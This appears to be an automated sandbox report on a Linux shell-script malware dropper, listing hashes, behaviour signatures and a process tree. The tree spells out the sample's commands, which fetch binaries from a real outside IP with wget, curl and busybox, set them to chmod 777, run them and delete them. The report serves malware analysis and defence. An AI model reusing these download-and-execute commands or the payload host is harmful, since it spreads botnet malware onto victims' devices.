Analysis
-
max time kernel
65s -
max time network
67s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:01
Static task
static1
Behavioral task
behavioral1
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
-
Size
10KB
-
MD5
688ca450547096f076169e59bab218e1
-
SHA1
2187af4719b3b2f94b20e5e3ad20b8222bc077ac
-
SHA256
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127
-
SHA512
4b9aa7e6693587d69eb70d43f25242123a62a6acd4b0c3bedd1533f2afb49f99d44f26bb6c17dbcf9ca11f2d689e80cccb1df2447fa39a4541d82c23b2c13b0c
-
SSDEEP
192:2e6/8cxOOD6Ock1sDEQ9OuNUMEQ9Oure6/8cbOOD6O9:2e6/8cxOOD6Ock1sDEQ9OuNUMEQ9OurZ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 742 chmod 752 chmod 776 chmod 904 chmod 916 chmod 934 chmod 946 chmod 804 chmod 880 chmod 898 chmod 928 chmod 970 chmod 982 chmod 976 chmod 811 chmod 862 chmod 886 chmod 922 chmod 940 chmod 964 chmod 868 chmod 910 chmod 958 chmod 820 chmod 892 chmod 952 chmod 849 chmod 874 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH 743 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF 753 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG 778 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS 805 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj 812 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c 822 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk 850 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN 863 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v 869 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb 875 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I 881 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 887 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc 893 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa 899 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 905 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN 911 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v 917 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb 923 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I 929 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc 935 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa 941 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj 947 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH 953 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF 959 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG 965 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS 971 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c 977 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk 983 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS curl File opened for modification /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN curl File opened for modification /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc curl File opened for modification /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj curl File opened for modification /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I curl File opened for modification /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk curl File opened for modification /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 curl File opened for modification /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa curl File opened for modification /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc curl File opened for modification /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb curl File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH curl File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG curl File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH curl File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF curl File opened for modification /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk curl File opened for modification /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v curl File opened for modification /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN curl File opened for modification /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb curl File opened for modification /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I curl File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF curl File opened for modification /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c curl File opened for modification /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v curl File opened for modification /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa curl File opened for modification /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj curl File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS curl File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG curl File opened for modification /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c curl File opened for modification /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 curl
Processes
-
/tmp/005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh/tmp/005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:719
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:741
-
-
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:747
-
-
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:756
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:757
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:771
-
-
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:778
-
-
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:781
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:782
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:799
-
-
/bin/chmodchmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:810
-
-
/bin/chmodchmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:814
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:816
-
-
/bin/chmodchmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:843
-
-
/bin/chmodchmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:853
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:855
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:858
-
-
/bin/chmodchmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:867
-
-
/bin/chmodchmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:873
-
-
/bin/chmodchmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:879
-
-
/bin/chmodchmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:885
-
-
/bin/chmodchmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:891
-
-
/bin/chmodchmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:897
-
-
/bin/chmodchmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:903
-
-
/bin/chmodchmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:909
-
-
/bin/chmodchmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:915
-
-
/bin/chmodchmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:921
-
-
/bin/chmodchmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:927
-
-
/bin/chmodchmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:933
-
-
/bin/chmodchmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:939
-
-
/bin/chmodchmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- File and Directory Permissions Modification
PID:940
-
-
